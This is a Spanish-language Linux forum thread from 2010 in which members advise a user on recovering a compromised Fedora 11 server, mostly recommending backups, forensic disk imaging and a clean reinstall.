Mensaje por hipersayan_x » Vie Sep 10, 2010 5:11 pm

Yo mucho de servidores no conozco pero te puedo ayudar con algunas pistas.
Acerca del Unreal3.2.8.1.tar.gz, encontre esto:

http://es-la.connect.facebook.com/topic ... 5&topic=89
http://www.unrealircd.com/

Parece ser un servidor de irc o algo así.

Con respecto al hideserver.c y antirandom.tar.gz parece ser un modulo del unrealircd:

http://www.escriptirc.com/archives/unre ... l-modules/

Haciendole un whois al sitio unknown.me.uk, encontramos esto:

http://whois.domaintools.com/unknown.me.uk

Con respecto a los archivos bash fijate si podes borrar las lineas maliciosas, y revisá bien quien llama a cada uno de esos archivos.
Con respecto al unrealircd fijate si se puede desinstalar del mismo archivo de instalación.
Fijate si podes eliminar los rootkits con alguna herramienta, y hace una actualización completa del sistema para que se reemplacen los binarios infectados.
Con respecto al script de backup es cuestión de leer el script en bash y entender lo que hace.
Desarrollo en Qt: Qt Developer Network
Mis proyectos: github | SourceForge.net
Avatar de Usuario
pataro
Forista Medio
Forista Medio
Mensajes: 341
Registrado: Vie Abr 18, 2008 7:00 am
Ubicación: Buenos Aires
Contactar:

Re: Mi servidor Fedora 11 ha sido hackeado. ¿Cómo limpio?

Mensaje por pataro » Vie Sep 10, 2010 6:15 pm

Mira, no sera tarea facil la tuya :P

Lo que _yo_ haria es lo siguiente:

1 - Obtener tanta informacion del servidor como se pueda. Ya sea fisica (red,discos,particiones,etc.) como logica (procesos en ejecucion, servicios instalados, modulos levantados, aplicaciones instaladas, reglas de firewall, usuarios, etc.)
2 - Obtener y resguardar los archivos de configuracion de cada uno de estos servicios/aplicaciones instalados.
3 - Comienzo a leer e interiorizarme sobre estos servicios que el server presta y paralelamente instalo en otro hardware lo mismo y lo configuro de la misma manera, obviamente leyendo los config originales. No los copies, quizas esten alterados por el ataque.
4 - Voy haciendo pruebas sobre estos servicios hasta tanto este seguro de que este casi todo contemplado.
5 - Selecciono el dia "D" y hago el cambio.

La idea de ir instalando todo en otro hardware es que no dejes sin servicio a tus clientes. No es peligroso (creo) que tu servidor este siendo utilizado por un grupo de hackers para atacar a otros servidores en Internet, hay mil millon en la misma situacion. Digamos que lo tienen secuestrado y no lo van a matar mientras les sea util. Utiliza este tiempo para ir instalando el otro.

Slds
Darkness2010
Forista Nuevo
Forista Nuevo
Mensajes: 4
Registrado: Vie Sep 10, 2010 1:23 pm

Re: Mi servidor Fedora 11 ha sido hackeado. ¿Cómo limpio?

Mensaje por Darkness2010 » Vie Sep 10, 2010 6:29 pm

Ok, muchas gracias por vuestras respuestas. Lo tendré en cuenta.
El Lunes continuaré intentando a ver qué camino seguimos!

Gracias!!!
Avatar de Usuario
Ayax
Administrador
Administrador
Mensajes: 3389
Registrado: Jue Ene 01, 1970 2:00 am
Ubicación: León, Guanajuato; México.
Contactar:

Re: Mi servidor Fedora 11 ha sido hackeado. ¿Cómo limpio?

Mensaje por Ayax » Vie Sep 10, 2010 8:12 pm

Hola, Darkness2010:

El problema mayor aquí es que está completamente comprometido el sistema., viendo los logs que has puesto. Y dado estás situaciones ya no hay mucho que hacer salvo reinstalar el sistema y correr todo en limpio.

Puedes limpiar aquí y haya lo que veas extraño, pero lo más seguro es que se estén ejecutando scripts que permanentemente tes estén sobreescribiendo todo, además en un caso en que pudieras limpiar la mayoría no faltara que quede algo que pueda darles acceso para volver a lo mismo.

Haz copias de seguridad de los datos que tengas en el servidor y reinstala todo. Es mejor dejar fuera de linea unos días el servidor a que te cierren la cuenta por que desde tu servidor se están dando ataques, intrusiones o lo están utilizando para spam.

Un saludo.
No hay nada que agradecer. Hago, lo tengo que hacer.
Reglamento del foro | Temas más preguntados | Twitter: @pacorevilla
Darkness2010
Forista Nuevo
Forista Nuevo
Mensajes: 4
Registrado: Vie Sep 10, 2010 1:23 pm

Re: Mi servidor Fedora 11 ha sido hackeado. ¿Cómo limpio?

Mensaje por Darkness2010 » Vie Sep 10, 2010 8:23 pm

Supongo que tienes razón. Me centraré en intentar reinstalar el sistema manteniendo las carpetas Home y será luego cuestión de restaurar los servicios que tenia instalados por ahí, o bien en intentar recuperar al 100% el sistema desde el Backup, si encuentro una forma segura de hacerlo. Supongo que de este modo es válido, ¿cierto? Ahora sólo me queda averiguar los pasos para realizar una instalación de ese tipo, sin un formateo completo...

Por cierto, no se trata de un servidor web, mail o FTP, sino que es un ordenador al que varios usuarios tienen acceso por SSH (y con VNC mediante túnel a través del SSH) y se utiliza para trabajar con programas de diseño profesional. No entiendo cómo han sabido de su existencia para entrar !!


Muchas gracias de nuevo!!!
Avatar de Usuario
mcun
Administrador
Administrador
Mensajes: 3888
Registrado: Lun Abr 19, 2010 12:30 am
Ubicación: En una de las nalgas del culo del mundo (según la Bersuit Vergarabat)
Contactar:

Re: Mi servidor Fedora 11 ha sido hackeado. ¿Cómo limpio?

Mensaje por mcun » Vie Sep 10, 2010 8:50 pm

Definitivamente la mejor solución es la re instalación ya que tendrás asegurado un sistema limpio.... deberías primero documentarte acerca de los servicios y luego de respaldar instalar todo nuevamente no debería llévate mas de 3 o 4 horas como mucho.

Ten en cuenta que si tu servidor esta secuestrado es mas pésimo el servicio que brindes (debido al riesgo) que si lo detienes por unas horas dando el aviso correspondiente a tus usuarios.

Yo de todos modos haría un dd de el disco, así como esta, para revisar como fue el ataque y así poder parchearlo.

Evalúa la situación que los usuarios pueden ser victimas de los secuestradores ¿ acaso no es peor que detener el servicio unas horas ? por otro lado has una lista breve de los servicios indispensables y los que puedes relegar para luego ve con calma y ya sabes puede contar con el foro para lo que presises ;)

saludos
Por cierto, no se trata de un servidor web, mail o FTP, sino que es un ordenador al que varios usuarios tienen acceso por SSH (y con VNC mediante túnel a través del SSH) y se utiliza para trabajar con programas de diseño profesional. No entiendo cómo han sabido de su existencia para entrar !!
simple escaneando rangos de red con nmap
Los programadores de verdad no documentan. La documentación es para los idiotas que no pueden leer un volcado de memoria.

Trusted Network and Developer | Lee el Reglamento !! |WIKI-EL | Twitter @mr_mcun
Debian + TTY | ArchLinux + awesome | openSUSE + Gnome-Shell | Linux User #508809
Avatar de Usuario
johpunk
Forista Ancestral
Forista Ancestral
Mensajes: 4530
Registrado: Mié Ago 09, 2006 7:00 am
Ubicación: Táchira - Venezuela

Re: Mi servidor Fedora 11 ha sido hackeado. ¿Cómo limpio?

Mensaje por johpunk » Vie Sep 10, 2010 11:30 pm

deberias de instalar la version mas actual de fedora que es la 13
Linux User #432922 ~ Linux Machine #390497
Gentoo 13.0 | ~amd64 | i3 improved | Github | dotfiles | Identi.ca | Twitter
irc.freenode.net | /join #gnu/linuxOS
Avatar de Usuario
hmg79
Forista Legendario
Forista Legendario
Mensajes: 2211
Registrado: Lun Mar 31, 2008 8:00 am

Re: Mi servidor Fedora 11 ha sido hackeado. ¿Cómo limpio?

Mensaje por hmg79 » Sab Sep 11, 2010 2:07 am

Yo lo que haría seria como comentaron antes, agarrar otro equipo y ir configurándolo lo mas parecido al servidor en cuestión, y pasarle los archivos de los trabajos nada mas.-
Y después darlo de baja al servidor en cuestión y formatearlo
Responder
  • Similar Topics
    Respuestas
    Vistas
    Último mensaje